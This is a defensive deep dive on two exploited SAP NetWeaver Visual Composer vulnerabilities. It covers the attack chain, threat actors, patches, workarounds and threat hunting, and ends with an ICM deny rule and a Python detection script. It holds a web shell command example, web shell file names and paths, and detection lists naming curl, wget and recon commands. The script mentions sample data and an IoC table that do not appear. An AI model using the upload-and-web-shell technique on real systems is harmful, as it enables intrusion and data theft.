Unveiling the Critical SAP Vulnerabilities

SAP NetWeaver Composes Nightmares. The Impact of CVE-2025-31324 and CVE-2025-42999

Discover the latest insights into the severe vulnerabilities impacting SAP systems worldwide. Learn how to protect your business-critical environments from potential exploitation.

The Deep Dive & CPE information.

CLAIM FREE CPE CREDITS BY READING THE DEEP DIVE

We get it—not everyone wants the super detailed nitty-gritty details. But we did the research, and it would be a shame to just let it rot in a file on our computers when it could just as easily rot here, where you can get the CPE credits for reading it. You know, if you’re into that kind of thing.

Expand the sections below to see the deep-dive content and for the pre-filled CPE submission info for CISSP, CISM, and CEH. You’re welcome. Tell your friends.


SAP Under Siege: Twin Zero-Days Demand Immediate Action – An In-depth Analysis of CVE-2025-31324 & CVE-2025-42999

1. Executive Summary: SAP Under Siege – Twin Zero-Days Demand Immediate Action

SAP systems, the backbone of countless global enterprises, are currently facing an acute and escalating threat. Two critical zero-day vulnerabilities within the SAP NetWeaver Visual Composer component, CVE-2025-31324 and CVE-2025-42999, are being actively exploited in the wild.1 Threat actors, including sophisticated China-nexus Advanced Persistent Threat (APT) groups, have been observed chaining these flaws to achieve full system compromise, with critical industries squarely in their sights.3 The urgency of this situation cannot be overstated; immediate patching, proactive threat hunting, and comprehensive security hardening are non-negotiable for any organization leveraging these ubiquitous SAP platforms.

The successful exploitation of these vulnerabilities grants attackers profound capabilities, including unauthenticated remote code execution (RCE), unauthorized data exfiltration, the deployment of debilitating ransomware, and ultimately, the complete takeover of SAP environments.2 Given that SAP systems often house an organization’s most sensitive data and manage its core operational processes, the potential for catastrophic business impact is exceptionally high.

The period of active zero-day exploitation preceding public disclosure and patch availability means that many systems could already be compromised. Attackers are known to deploy web shells and other backdoors for persistent access.1 Consequently, patching alone is an insufficient response; it addresses the vulnerability but does not remove existing malicious footholds.8 Organizations applying patches now must recognize this “patch paradox”—the fix might prevent future exploitation but does not remediate past intrusions. This necessitates retrospective threat hunting as a critical, parallel activity.

Furthermore, the confirmed involvement of multiple, well-resourced APT groups, such as Chaya_004 and UNC5221, signifies that these SAP vulnerabilities are viewed as high-value access vectors, likely for strategic espionage or disruption, extending beyond mere opportunistic attacks.3 The emergence of a “second wave” of attacks, where subsequent threat actors leverage backdoors established by initial exploiters, underscores an escalating and evolving threat landscape.4 This indicates that the value of the compromised access is sufficiently high to attract a succession of adversaries, potentially with increasing sophistication or differing objectives.

In response to this critical threat, organizations must prioritize the urgent application of SAP Security Notes 3594142 (addressing CVE-2025-31324) and 3604119 (addressing CVE-2025-42999).12 Concurrently, intensive investigations for any signs of existing compromise are crucial, alongside the implementation of robust detection mechanisms and system hardening measures.

2. Vulnerability Deep Dive: Unpacking CVE-2025-31324 and CVE-2025-42999

SAP NetWeaver Visual Composer is a web-based software modeling tool that enables business process specialists and developers to create application components for use within the SAP NetWeaver Portal, often without extensive coding.8 It has been included by default with base SAP NetWeaver installations since version 2004s, significantly broadening the potential attack surface.8 While not always actively enabled or configured in every deployment, its widespread presence, often as a dormant component, contributes to the risk.9 This “default but not always active” status can create a dangerous blind spot, as organizations might not realize a vulnerable component is present within their environment, particularly since Visual Composer has been deprecated since 2015.18 Asset inventory and specific checks for the VCFRAMEWORK component are therefore vital first steps.9

CVE-2025-31324: The Open Door – Unauthenticated Arbitrary File Upload

This vulnerability, assigned CVE-2025-31324, carries a CVSS v3.1 score of 10.0 (Critical).6 It originates from a fundamental missing authorization check in the Metadata Uploader component of SAP NetWeaver Visual Composer.6 This flaw is accessible via the /developmentserver/metadatauploader HTTP endpoint.6

The technical mechanics are alarmingly straightforward: any unauthenticated user, from anywhere on the network (including the internet, if the SAP system is exposed), can send specially crafted HTTP POST requests to this endpoint.6 These requests can upload arbitrary files, most notably JSP (Java Server Pages) web shells, directly onto the server’s file system.6 Attackers frequently place these malicious files into web-accessible directories, such as /irj/servlet_jsp/irj/root/.8

The impact is immediate and severe: Remote Code Execution (RCE).2 Once the web shell is uploaded, the attacker can execute arbitrary operating system commands with the privileges of the SAP application server process, typically the <SID>ADM user.6 Gaining execution context as <SID>ADM is a critical blow, as this user is effectively the SAP system administrator at the OS level. It possesses extensive permissions over SAP application directories, database configurations, and can execute a wide range of OS commands, leading to full system compromise.2 This is not merely application-level access; it is system-level control within the context of a business-critical application, essentially “game over” for that SAP system.

All SAP NetWeaver 7.x versions incorporating the Visual Composer Framework (VCFRAMEWORK) component are affected if left unpatched.2 SAP Security Note 3594142 provides an automated correction specifically for version 7.50.6 Older, unmaintained versions (e.g., 7.0-7.40) require manual workarounds.16

CVE-2025-42999: The Insider Threat Vector – Privileged Insecure Deserialization

The second vulnerability, CVE-2025-42999, is rated CVSS v3.0 9.1 (Critical) (CVSS v2: 8.3 High).12 It affects the SAP NetWeaver Visual Composer Metadata Uploader and is classified as an Insecure Deserialization flaw (CWE-502: Deserialization of Untrusted Data).21 Unlike its counterpart, this vulnerability requires the attacker to be a privileged user to upload untrusted or malicious content.13 When the SAP system subsequently deserializes this specially crafted content, it can lead to RCE, thereby compromising the confidentiality, integrity, and availability of the host system.1

While requiring initial privileged access might seem to make it less immediately dangerous than CVE-2025-31324, its critical CVSS score reflects the potential for severe damage if exploited. This could occur if an attacker has already gained privileged access through other means (including CVE-2025-31324) or through social engineering of an authorized user. The affected component is EP-VC-INF, with VCFRAMEWORK 7.50 specifically mentioned.12

A crucial operational detail is that SAP Security Note 3604119, which addresses CVE-2025-42999, must be applied even if Security Note 3594142 (for CVE-2025-31324) has already been implemented.12 This is because CVE-2025-31324 provides the unauthenticated entry, but CVE-2025-42999 can be exploited independently if privileged access is achieved via other vectors.

Table: Vulnerability Overview

To provide a clear, at-a-glance comparison of these two critical vulnerabilities, the following table summarizes their key characteristics:

| CVE ID | CVSS v3.x Score | Severity | Vulnerability Type | Key Affected Component | Primary Impact(s) | Initial Privilege Req. | SAP Security Note |
|---|---|---|---|---|---|---|---|
| CVE-2025-31324 | 10.0 | Critical | Unauthenticated Arbitrary File Upload | SAP NetWeaver Visual Composer | RCE, Full System Compromise | None | 3594142 |
| CVE-2025-42999 | 9.1 | Critical | Insecure Deserialization | SAP NetWeaver Visual Composer | RCE, C/I/A Compromise | Privileged User | 3604119 |

3. Anatomy of an Attack: From Initial Breach to Full Compromise

Understanding the typical attack lifecycle involving these vulnerabilities is crucial for effective defense. Threat actors have demonstrated a clear and repeatable pattern, often culminating in complete system control and the deployment of sophisticated post-exploitation tools.

Initial Access: Exploitation of CVE-2025-31324

The attack typically commences with the exploitation of CVE-2025-31324 due to its unauthenticated nature.

  1. Targeting the Vulnerable Endpoint: Attackers send a specially crafted HTTP POST request to the /developmentserver/metadatauploader endpoint of an exposed SAP NetWeaver system.6
  2. Bypassing Authentication & Uploading Web Shells: This request, requiring no prior authentication, successfully uploads a malicious file. The most common payload for this stage is a JSP web shell.6 Common filenames observed include helper.jsp and cache.jsp 6, but to evade signature-based detection, attackers also use randomly generated 8-character names (e.g., cglswdjp.jsp, ssonkfrd.jsp) or other less common names like coreasp.js.9
  3. Placement in Web-Accessible Directories: These web shells are typically placed in directories that are accessible via a web browser, such as j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/.8
  4. Executing Commands: Once the web shell is in place, the attacker can interact with it by sending simple HTTP GET requests (e.g., /irj/helper.jsp?cmd=id) to execute arbitrary operating system commands on the compromised server.7

The Deadly Combination: Chaining CVE-2025-31324 with CVE-2025-42999

Security researchers, notably from Onapsis, have confirmed that attackers are not always using these vulnerabilities in isolation. Since at least March 2025 (with initial probes dating back to January 2025), threat actors have been observed abusing both the lack of authentication provided by CVE-2025-31324 and the insecure deserialization mechanism of CVE-2025-42999.1

This chained exploitation is particularly dangerous because it allows attackers to execute arbitrary commands remotely without requiring any initial privileges on the system.1 The unauthenticated file upload (CVE-2025-31324) provides the initial RCE capability. The execution context of this initial web shell (often as <SID>ADM or another privileged SAP user) then fulfills the “privileged user” prerequisite for CVE-2025-42999. Attackers can then leverage this privileged context to upload further malicious content specifically designed to trigger the deserialization vulnerability. This secondary exploit might be used for more stealthy or powerful code execution, to achieve deeper persistence, or to exploit different facets of the SAP system.

It is important to recognize that applying the patch for CVE-2025-31324 (SAP Security Note 3594142) significantly mitigates the risk of this chained attack by closing off the initial unauthenticated entry point.5 However, for comprehensive protection, especially against scenarios where an attacker might gain initial privileged access through alternative means, patching CVE-2025-42999 (SAP Security Note 3604119) is also essential.

Post-Exploitation Playbook: Attacker TTPs After Initial Access

Once initial access is gained, attackers deploy a range of tactics, techniques, and procedures (TTPs) to solidify their control, conduct reconnaissance, and achieve their ultimate objectives. The observed TTPs indicate a degree of sophistication and familiarity with enterprise environments, including SAP-specific nuances. Attackers are not merely dropping generic malware; they are leveraging techniques and targeting information pertinent to SAP systems, such as aiming for <SID>ADM privileges and mapping SAP-specific application landscapes.4 This suggests an understanding of the target environment that goes beyond superficial exploitation.

The attack is rarely a single event but rather a campaign, often involving multiple stages and tools. This multi-stage lifecycle underscores the need for defense-in-depth, as detection opportunities may arise at various points beyond the initial breach.

  • Persistence: The primary method for maintaining long-term access is the deployment of various web shells, as detailed earlier.1
  • Command and Control (C2) & Payload Delivery:
      • Brute Ratel C4: This commercial post-exploitation framework has been frequently observed. Attackers use it to load and decrypt malicious payloads, facilitate privilege escalation, steal credentials, and maintain C2 communication.3
      • Custom/Go-based Shells: The Chaya_004 group is known to deploy “SuperShell,” a Go-based reverse shell, often hosted on attacker-controlled infrastructure like IP address 47.97.42[.]177.2
      • Other Frameworks/Loaders: UNC5221 has deployed KrustyLoader (Rust-based) to deliver second-stage payloads like Sliver. UNC5174 has used the SNOWLIGHT loader to fetch a Go-based Remote Access Trojan (RAT) named “VShell” and the GOREVERSE backdoor.5
      • Tool Transfer: Attackers use curl or the initial web shell to download further tools and payloads onto the compromised system.2
      • Proxies: Reverse SSH SOCKS proxies are used for C2.6 Chaya_004 also utilizes NPS (an intranet penetration proxy) and GO Simple Tunnel.2
  • Defense Evasion:
      • Heaven’s Gate: This technique has been used to bypass endpoint security solutions.7
      • Obfuscation: ELF binaries have been observed obfuscated with tools like Garble.6
      • Fileless Execution: The coreasp.js web shell dynamically defines and loads Java classes in memory, avoiding disk writes and thus file-based detection.26
  • Reconnaissance:
      • Extensive use of standard operating system commands to gather information about the compromised system and its network environment: whoami, ipconfig/ifconfig, netstat, ps, ls, pwd, uname, df, id, hostname, net user, nltest.6
      • Specific efforts to map SAP applications and identify backup details, likely for lateral movement or deeper compromise.26
  • Impact/Objectives: The end goals vary but include:
      • Full system takeover and control.2
      • Exfiltration of sensitive data from SAP systems.7
      • Deployment of ransomware.7
      • Cryptocurrency mining.10
      • Service disruption, for example, by corrupting Universal Description Discovery and Integration (UDDI) entries, which can affect communication between SAP modules like CRM, SCM, or SRM.2

The unauthenticated RCE capability of CVE-2025-31324 makes it a highly effective “gateway vulnerability.” Its ease of exploitation attracts a diverse range of threat actors, from sophisticated APTs focused on espionage or sabotage to financially motivated criminals deploying ransomware or cryptojackers. This means organizations face a multifaceted threat landscape stemming from this single initial point of weakness.

4. Global Impact Assessment: Scope, Prevalence, and Targeted Industries

The exploitation of CVE-2025-31324 and CVE-2025-42999 has had a tangible global impact, affecting a significant number of organizations across various critical sectors. The widespread deployment of SAP systems means that these vulnerabilities present a substantial systemic risk.

The Numbers Game: Vulnerable Instances Worldwide

Multiple security organizations have provided estimates of internet-facing SAP NetWeaver instances vulnerable to these flaws, painting a concerning picture of exposure:

  • Onyphe: As of late April 2025, it reported approximately 1,284 vulnerable NetWeaver instances accessible online, with a startling 474 of those already compromised with web shells. Its findings indicated that around 20 companies from the Fortune 500 or Global 500 lists were among the vulnerable, many already breached.1
  • The Shadowserver Foundation: In late April 2025, it was tracking over 2,040 SAP NetWeaver servers accessible via the internet and deemed vulnerable.1 Initial scans identified between 427 and over 450 exposed vulnerable instances globally.14
  • Onapsis: Also in late April 2025, it identified more than 10,000 internet-facing SAP applications that could potentially be at risk. It estimated that 50-70% of these applications have the vulnerable Visual Composer component enabled.16 Onapsis, in conjunction with Mandiant, has been tracking hundreds of confirmed compromises worldwide.4
  • EclecticIQ: Uncovered attacker-controlled infrastructure containing a file that listed 581 SAP NetWeaver instances already compromised and backdoored with a web shell. Another file on the same infrastructure listed 800 domains running SAP NetWeaver, likely earmarked for future targeting.5

Geographically, data from The Shadowserver Foundation highlighted that the United States had the highest number of vulnerable servers (132-149), followed by India (45-50), Australia (37-38), Germany (29-30), and China (26-31).31

The sheer number of SAP installations globally, coupled with varying security maturity levels across organizations and the often-overlooked status of the Visual Composer component, suggests that vulnerable instances will likely persist for an extended period. This creates a “long tail” of potential compromise opportunities for attackers, well beyond the initial zero-day disclosure window. Patching complex enterprise systems like SAP can be a slow and resource-intensive process 12, and older, unsupported NetWeaver versions (7.0-7.40) will not receive automated patches, relying instead on manual workarounds.16

High-Value Targets: Industries in the Crosshairs

Given that SAP systems are integral to the operations of large enterprises and government agencies, they represent high-value targets for attackers.7 The observed exploitation patterns reveal a clear focus on several key industries:

  • Manufacturing: Consistently highlighted as being heavily targeted and impacted.4
  • Energy and Utilities / Critical Infrastructure: These sectors have been actively pursued by attackers leveraging these vulnerabilities.3
  • Oil and Gas: Specifically named as a targeted vertical.4
  • Government Organizations: A prime target due to the sensitive data and critical functions they manage.7
  • Media and Entertainment.3
  • Pharmaceuticals.3
  • Retail.3
  • Organizations listed in the Fortune 500 / Global 500.1

The deliberate targeting of critical infrastructure sectors like manufacturing, energy, utilities, and oil & gas by sophisticated APTs is particularly alarming.3 SAP systems in these environments often manage or integrate with core industrial processes. A successful compromise could extend beyond data theft, potentially leading to operational shutdowns, manipulation of industrial controls, or even safety incidents, posing risks to national security and public safety.

Real-World Cases & Threat Actor Spotlight

The timeline of exploitation reveals that attackers had early knowledge of these vulnerabilities:

  • Reconnaissance: Onapsis observed reconnaissance activity related to CVE-2025-31324 as early as January 2025.5 Palo Alto Networks also noted suspicious HTTP requests targeting the vulnerable endpoint in late January 2025.6
  • Initial Exploitation: The first known instances of active exploitation occurred around March 12-14, 2025.5 Rapid7’s Managed Detection and Response (MDR) team observed exploitation from March 27, 2025, onwards.7
  • Vendor Response: SAP released a workaround on April 8, 2025 29, followed by an emergency patch for CVE-2025-31324 (SAP Security Note 3594142) on April 24, 2025.6 The patch for CVE-2025-42999 (SAP Security Note 3604119) was released on May 12/13, 2025.1

Several distinct threat actor groups have been linked to these attacks:

  • Chaya_004 (China-nexus): Identified by Forescout, this group has been exploiting CVE-2025-31324 since at least April 29, 2025 (post-patch release). They utilize the “SuperShell” (a Go-based reverse shell) and an extensive toolkit of Chinese-origin penetration testing tools. Their infrastructure is often hosted on Chinese cloud provider platforms (Alibaba, Tencent, Huawei), with associated IP addresses including 47.97.42[.]177 and 8.210.65[.]56.2
  • Other China-Nexus APTs: Research from EclecticIQ, Mandiant, and Palo Alto Networks has attributed activity to additional China-nexus APTs, including UNC5221, UNC5174, and CL-STA-0048. These groups are reportedly linked to China’s Ministry of State Security (MSS) and deploy various loaders and backdoors such as KrustyLoader, Sliver, SNOWLIGHT, VShell, and GOREVERSE.3
  • Opportunistic Attackers: Beyond state-sponsored groups, opportunistic attackers have also been observed exploiting publicly available information and leveraging web shells placed by the initial attackers.10 Their motivations can include cryptocurrency mining.10
  • Initial Access Brokers (IABs): ReliaQuest researchers posited that some initial attackers might be IABs, based on observed delays between gaining initial access and subsequent follow-up actions.14

This progression from initial discovery and exploitation (potentially by vulnerability researchers or IABs) to targeted APT campaigns, and subsequently to broader opportunistic exploitation, illustrates an attacker ecosystem where different actors can build upon or benefit from each other’s activities. Public disclosure of vulnerability details and proof-of-concept exploits further fuels this cycle, meaning the threat landscape for a given vulnerability evolves rapidly, requiring defenders to anticipate this evolution.

5. Risk Profile & Business Implications: Understanding the True Cost

The confluence of high technical severity, active exploitation by sophisticated actors, and the critical role of SAP systems in business operations creates an exceptionally high-risk profile for organizations. Understanding these risks is paramount for prioritizing defensive actions and communicating the potential business impact to stakeholders.

Aggregated Risk Factors

Several factors contribute to the severe risk posed by CVE-2025-31324 and CVE-2025-42999:

  • Extreme CVSS Scores: CVE-2025-31324 holds a CVSS score of 10.0 (Critical), the maximum possible, while CVE-2025-42999 is rated 9.1 (Critical). These scores reflect extreme technical severity and potential for damage.6
  • Confirmed Active Exploitation: Both vulnerabilities are being actively exploited “in-the-wild” by a diverse range of threat actors, from highly sophisticated state-sponsored APTs to opportunistic cybercriminals. This transitions the threat from theoretical to immediate and tangible.1
  • CISA Known Exploited Vulnerabilities (KEV) Catalog: The inclusion of CVE-2025-31324 in CISA’s KEV catalog mandates patching by U.S. federal agencies and strongly signals its widespread exploitation and critical nature to all organizations.1
  • Ease of Exploitation (CVE-2025-31324): The lack of an authentication requirement for CVE-2025-31324, allowing direct RCE via a single HTTP request, makes it exceptionally easy for attackers to exploit.6
  • Potent Chaining Capability: The ability for attackers to chain CVE-2025-31324 with CVE-2025-42999 to achieve unauthenticated remote code execution with high privileges significantly amplifies the overall threat.1

Potential Business Implications

A successful breach leveraging these vulnerabilities can have devastating consequences for an organization, striking at its operational core and financial stability. SAP systems are frequently the “crown jewels” of an enterprise, managing its most critical data and processes. A compromise here is not a peripheral IT issue but a fundamental threat to the business itself.

  • Catastrophic Data Breach: Unauthorized access to, and exfiltration of, highly sensitive business data managed by SAP systems. This includes financial records, customer databases, intellectual property, strategic plans, and employee personally identifiable information (PII).7
  • Severe Operational Disruption: Attackers can halt or cripple critical business processes that depend on SAP systems. This can lead to manufacturing shutdowns, supply chain interruptions, inability to process orders or deliver services, and prolonged downtime, resulting in significant loss of productivity.2
  • Substantial Financial Losses: The direct and indirect costs can be enormous, encompassing incident response and forensic investigation fees, system recovery and restoration expenses, regulatory fines (e.g., under GDPR for data breaches), legal liabilities, and lost revenue due to operational disruptions and reputational harm.
  • Irreparable Reputational Damage: Public disclosure of a major breach involving core SAP systems can lead to a severe loss of customer trust, damage to the brand’s image, negative investor sentiment, and sustained adverse media attention.
  • Ransomware Deployment: The full system compromise achievable through these vulnerabilities makes SAP infrastructure a prime target for ransomware attacks. Attackers can encrypt essential data and critical system components, holding the organization’s operations hostage.7
  • Espionage and Strategic Sabotage: In the context of state-sponsored attacks, the objectives may include long-term industrial or economic espionage, theft of national security information, or the strategic disruption of critical infrastructure and key industries.3
  • Compliance and Regulatory Failures: A breach can result in non-compliance with numerous industry and governmental regulations related to data security, privacy, and system integrity, leading to further penalties and legal challenges.

The interconnected nature of modern business also means that the compromise of a major organization’s SAP systems can create a supply chain security risk. Many Fortune 500 companies, which are confirmed to be affected 1, act as central hubs in extensive supply chains. A breach at such a hub could expose partner data, disrupt shared processes, or even serve as a pivot point for attacks against connected entities.

Furthermore, as organizations increasingly rely on platforms like SAP for their digital transformation initiatives (e.g., migrations to S/4HANA 10), high-impact vulnerabilities of this nature can erode trust in these critical platforms. This can lead to increased scrutiny, demands for greater security investment, and potentially slow down strategic projects if the perceived risks are deemed too high, adding a strategic drag to the immediate costs of a breach.

6. Fortifying Your Defenses: Comprehensive Mitigation and Detection Strategies

Addressing the severe threats posed by CVE-2025-31324 and CVE-2025-42999 requires a multi-faceted approach encompassing immediate patching, system hardening, proactive threat hunting, and robust detection mechanisms. Given the active exploitation before patches were widely available, organizations must operate under the assumption of potential compromise and act decisively.

Priority One: Patch and Remediate – The SAP Security Notes

The most critical step is the immediate application of the relevant SAP Security Notes:

  • SAP Security Note 3594142 (for CVE-2025-31324):
      • Released on April 24, 2025, this “HotNews” note (CVSS 10.0) addresses the unauthenticated file upload vulnerability in SAP NetWeaver Visual Composer.11
      • It provides an automated correction for version 7.50 of the Visual Composer Framework (VCFRAMEWORK).20
      • The core fix involves implementing proper authentication and authorization checks to prevent unauthorized access and file uploads to the /developmentserver/metadatauploader endpoint.20
      • This patch is the primary defense against the initial unauthenticated exploitation vector.
  • SAP Security Note 3604119 (for CVE-2025-42999):
      • Released on May 13, 2025, this “HotNews” note (CVSS 9.1) addresses the insecure deserialization vulnerability in the Visual Composer Metadata Uploader, which can be exploited by a privileged user.12
      • Crucially, SAP and security researchers emphasize that this note MUST be implemented IN ADDITION to Note 3594142 to fully secure the Visual Composer component.12 While 3594142 blocks the unauthenticated entry, 3604119 is necessary to prevent exploitation if an attacker gains privileged access through other means or if malicious insider activity occurs.
  • SAP KBA 3593336 (Workarounds for Older/Unsupported Versions):
      • This Knowledge Base Article provides workaround guidance for SAP NetWeaver Java versions 7.0-7.40, which are no longer maintained by SAP and thus do not receive automated patches.16 These workarounds may also serve as temporary measures if patching of version 7.50 is unavoidably delayed.
      • Workaround Options Include:
          1. Disable Visual Composer (VCFRAMEWORK): If the Visual Composer component is not essential for business operations, it should be disabled entirely. SAP Note 2501341 provides directions for this.2 Visual Composer has been deprecated since 2015, making its removal a viable option for many.18
          2. Disable the application alias for the Development Server: This restricts access to the specific vulnerable endpoint.18
          3. Block access to the Development Server / Metadata Uploader endpoint: This can be achieved through:
              • Access Control Lists (ACLs) defined within the Internet Communication Manager (ICM).20
              • URL restrictions implemented via network firewall rules or the SAP Web Dispatcher to block access to /developmentserver/metadatauploader.2
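To make workaround option 3 concrete, here is an added illustration (not taken from SAP's notes or from this page) of an ICM permission file that denies the Metadata Uploader path while leaving the rest of the portal reachable. The parameter name icm/HTTP/auth_<xx> with PREFIX/PERMFILE, the P/D line syntax and first-match evaluation are our recollection of the ICM permission-file format and are assumptions to be verified against SAP KBA 3593336 and the ICM documentation; the file name under $(DIR_INSTANCE)/sec is an arbitrary choice.

```text
# Instance profile parameter (assumed syntax): bind a permission file to all URLs.
# Works the same way on the Java application server's ICM and on SAP Web Dispatcher.
icm/HTTP/auth_0 = PREFIX=/, PERMFILE=$(DIR_INSTANCE)/sec/icm_permissions.txt

# $(DIR_INSTANCE)/sec/icm_permissions.txt
# Lines are evaluated top to bottom; the first matching pattern decides.
# D = deny, P = permit. Deny the development server alias (which hosts
# /developmentserver/metadatauploader) before the catch-all permit.
D /developmentserver/*
P /*
```

After activating the file (a restart of the ICM or Web Dispatcher is normally required for profile changes), confirm the block from an untrusted network position with a plain request to the endpoint and expect an HTTP 403; a 200 means the rule is not in effect. Because this only filters HTTP paths, it does not replace Note 3594142 on supported releases and does nothing about web shells already written to disk.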

Organizations should apply these patches on an emergency basis, without waiting for standard patch cycles.9 It is vital to understand that patching addresses the vulnerability going forward but does not remove any web shells, backdoors, or other malicious artifacts that may have been placed on the system prior to patching.8

Hardening Your SAP Landscape

Beyond patching, several hardening measures can reduce the attack surface and limit the impact of potential compromises:

  • Restrict Network Access: As detailed in the workarounds, strictly limit network exposure of the /developmentserver/metadatauploader endpoint and other non-essential SAP services, especially from the internet.2
  • Disable Unused Components: Regularly review and disable or uninstall SAP components that are not actively used, such as Visual Composer (VCFRAMEWORK.SCA if confirmed unnecessary via system info checks like http://host:port/nwa/sysinfo).2
  • Network Segmentation: Implement robust network segmentation to isolate SAP systems, particularly internet-facing ones, from other parts of the corporate network. This can help contain breaches and limit lateral movement by attackers.8
  • Principle of Least Privilege: Ensure that SAP user accounts, service accounts, and system processes operate with the minimum necessary permissions.
  • Regular Security Assessments: Conduct frequent vulnerability scans and penetration tests that specifically include SAP NetWeaver endpoints and applications.2

Active Threat Hunting and Detection

Given the likelihood of pre-patch compromises, proactive threat hunting is essential.

  • Log Analysis and SIEM Integration:
      • Ensure comprehensive logging for SAP NetWeaver systems, including web server access logs, application server logs, and security audit logs. Forward these logs to a centralized Security Information and Event Management (SIEM) system for correlation and analysis.18
      • Monitor for suspicious HTTP POST requests to /developmentserver/metadatauploader, especially those with unusual characteristics or originating from untrusted sources.6
      • Hunt for HTTP GET requests to .jsp files (e.g., helper.jsp?cmd=…, cache.jsp?cmd=…, or randomly named .jsp files) in web server logs, particularly those containing command execution parameters or originating from unexpected IP addresses.8
      • Look for abnormal access patterns or changes to service entries, especially those occurring outside of standard maintenance windows.2
      • Investigate successful logins that occur immediately following suspected web shell activity or originate from atypical source IPs or geolocations.26
  • Endpoint Detection and Response (EDR) and File System Monitoring:
      • Actively scan SAP server file systems for known web shell filenames (e.g., helper.jsp, cache.jsp, usage.jsp, .webhelper.jsp, forwardsap.jsp, 404_error.jsp, .h.jsp, coreasp.js) and suspicious patterns (e.g., randomly named 8-character [a-z]{8}.jsp files, or variable-length alphanumeric names ≤ 10 characters ending in .jsp).6
      • Common deployment paths to inspect include the following (and their Windows equivalents):6
          • …/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/
          • …/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/
          • …/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/sync/
      • A command such as find . -type f \( -name "*.jsp" -o -name "*.java" -o -name "*.class" \) -ls, run from within those directories, can help locate potentially malicious files.26
      • Monitor for suspicious process execution chains, such as SAP server processes (e.g., java.exe) spawning command shells (cmd.exe, sh) or unexpected utilities like curl or wget downloading files from untrusted sources.
      • Look for the execution of reconnaissance commands (e.g., whoami, net user, ipconfig, ps, ls, id) by SAP service accounts.6
  • Network Intrusion Detection/Prevention Systems (NIDS/NIPS):
      • Deploy and update NIDS/NIPS signatures specifically designed to detect exploitation attempts against CVE-2025-31324 (e.g., SonicWall IPS signature 20946;8 Stormshield http:client.107 28).
      • Monitor for network traffic patterns indicative of C2 communications associated with tools like Brute Ratel, SuperShell, Sliver, or Cobalt Strike.
  • IOC Scanning Tools and Detection Rules:
      • Leverage specialized tools like the open-source IOC scanner for CVE-2025-31324 released by Onapsis and Mandiant. This tool can help detect if a system is vulnerable, identify known IoCs, scan for unknown web-executable files in known exploit paths, and collect suspicious files for further analysis.11
      • Utilize detection rules and content from security vendors:
          • SOC Prime provides Sigma rules for detecting CVE-2025-31324 exploitation attempts.7
          • Layer Seven Security’s Cybersecurity Extension for SAP includes capabilities to detect exploitation attempts and the presence of malicious files.20
          • Rapid7 InsightIDR offers detection rules for related attacker techniques such as net command enumeration, nltest execution, and suspicious PowerShell downloads.9
          • Palo Alto Networks Cortex Xpanse can identify internet-exposed SAP systems and includes an Attack Surface Test to confirm exploitability for this vulnerability.6
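As an added example (not code from this article or from any of the vendors it cites), the following Python script turns the three hunting checks above into something you can run over your own data: it flags access-log requests to the upload endpoint and to shell-like .jsp names, classifies file listings from the drop directories (Linux or Windows paths, as in the IoC table below), and flags SAP server processes spawning shells or reconnaissance commands. The combined-style log format, the process record shape, the SAP parent image names (java, jstart) and all sample data are assumptions; the indicator names themselves come from the write-up.

```python
# Added example (not the article's or any vendor's tool): hunts for the CVE-2025-31324
# web shell tradecraft described above in web access logs, file listings and process
# events. Log format, process record shape and all sample data are constructed assumptions.
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

UPLOAD_ENDPOINT = "/developmentserver/metadatauploader"
KNOWN_SHELLS = {  # web shell file names reported in the cited sources
    "helper.jsp", "cache.jsp", "usage.jsp", ".webhelper.jsp", "forwardsap.jsp", "404_error.jsp",
    ".h.jsp", "coreasp.js", "ssonkfrd.jsp", "cglswdjp.jsp", "rrx.jsp", "dyceorp.jsp", "ran.jsp",
}
RANDOM_8 = re.compile(r"^[a-z]{8}\.jsp$")             # e.g. ssonkfrd.jsp
SHORT_ALNUM = re.compile(r"^[A-Za-z0-9]{1,10}\.jsp$")  # <= 10 alphanumerics + .jsp
SHELL_DIRS = ("/irj/servlet_jsp/irj/root/", "/irj/servlet_jsp/irj/work/")  # drop dirs, '/' form
RECON_CMDS = {"whoami", "net", "ipconfig", "ifconfig", "ps", "ls", "id", "hostname",
              "netstat", "nltest", "uname"}
SHELLS_AND_DOWNLOADERS = {"cmd", "sh", "bash", "curl", "wget"}
SAP_PARENTS = {"java", "jstart"}  # assumption: image names of the SAP Java server processes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_jsp_name(path):
    """Return 'known', 'random8', 'shortname' or '' for a file name or path."""
    base = path.replace("\\", "/").rsplit("/", 1)[-1]
    if base in KNOWN_SHELLS:
        return "known"
    if RANDOM_8.match(base):
        return "random8"
    if SHORT_ALNUM.match(base):
        return "shortname"  # low confidence: legitimate short names match too
    return ""

def scan_file_listing(paths):
    """Flag files under the known drop directories whose names look like shells."""
    hits = []
    for p in paths:
        norm = p.replace("\\", "/")  # accept Windows paths too
        verdict = classify_jsp_name(norm) if any(d in norm for d in SHELL_DIRS) else ""
        if verdict:
            hits.append((p, verdict))
    return hits

def scan_access_log(lines):
    """Flag POSTs to the upload endpoint and GETs that look like web shell use."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if m["method"] == "POST" and url.path.startswith(UPLOAD_ENDPOINT):
            findings.append((m["ip"], "upload-endpoint-post", m["target"]))
        elif url.path.endswith((".jsp", ".js")) and "cmd" in parse_qs(url.query):
            findings.append((m["ip"], "webshell-command", m["target"]))
        elif classify_jsp_name(url.path) in ("known", "random8"):  # 'shortname' too noisy here
            findings.append((m["ip"], "webshell-name", m["target"]))
    return findings

@dataclass
class ProcEvent:  # one process-creation record: user, parent image, child image, command line
    user: str
    parent: str
    image: str
    cmdline: str

def _image_name(image):
    base = image.lower().replace("\\", "/").rsplit("/", 1)[-1]
    return base[:-4] if base.endswith(".exe") else base

def scan_process_events(events, sap_users):
    """Flag SAP server processes spawning shells/downloaders and recon run by SAP accounts."""
    findings, users = [], {u.lower() for u in sap_users}
    for ev in events:
        parent, image = _image_name(ev.parent), _image_name(ev.image)
        if parent in SAP_PARENTS and image in SHELLS_AND_DOWNLOADERS:
            findings.append(("sap-process-spawned-shell", ev))
        if ev.user.lower() in users and image in RECON_CMDS:
            findings.append(("recon-by-sap-account", ev))
    return findings

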